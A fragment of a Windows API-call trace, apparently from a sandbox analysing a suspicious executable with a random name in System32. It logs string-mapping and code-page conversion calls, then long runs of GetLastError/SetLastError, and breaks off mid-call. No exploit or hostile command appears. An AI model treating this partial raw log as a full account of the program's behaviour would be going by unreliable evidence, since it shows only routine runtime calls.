¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ끞矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.904] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ끞矲狰Ā", cchSrc=256, lpDestStr=0x2ae9e8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0033.904] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x2af1c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9cÌõôüó*", lpUsedDefaultChar=0x0) returned 256 [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af2c4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0033.905] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x2af2c4, cbMultiByte=256, lpWideCharStr=0x2aec18, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ끞矲狰Ā") returned 256 [0033.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ끞矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0033.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ끞矲狰Ā", cchSrc=256, lpDestStr=0x2aea08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0033.905] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x2af0c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x9cÌõôüó*", lpUsedDefaultChar=0x0) returned 256 [0033.905] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.905] SetLastError (dwErrCode=0x0) [0033.905] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.906] GetLastError () returned 0x0 [0033.906] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.907] GetLastError () returned 0x0 [0033.907] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.908] GetLastError () returned 0x0 [0033.908] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.909] SetLastError (dwErrCode=0x0) [0033.909] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.910] SetLastError (dwErrCode=0x0) [0033.910] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.911] SetLastError (dwErrCode=0x0) [0033.911] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.912] GetLastError () returned 0x0 [0033.912] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.913] SetLastError (dwErrCode=0x0) [0033.913] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.921] SetLastError (dwErrCode=0x0) [0033.921] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.922] SetLastError (dwErrCode=0x0) [0033.922] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.923] SetLastError (dwErrCode=0x0) [0033.923] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.924] GetLastError () returned 0x0 [0033.924] SetLastError (dwErrCode=0x0) [0033.925] GetLastError () returned 0x0 [0033.925] SetLastError 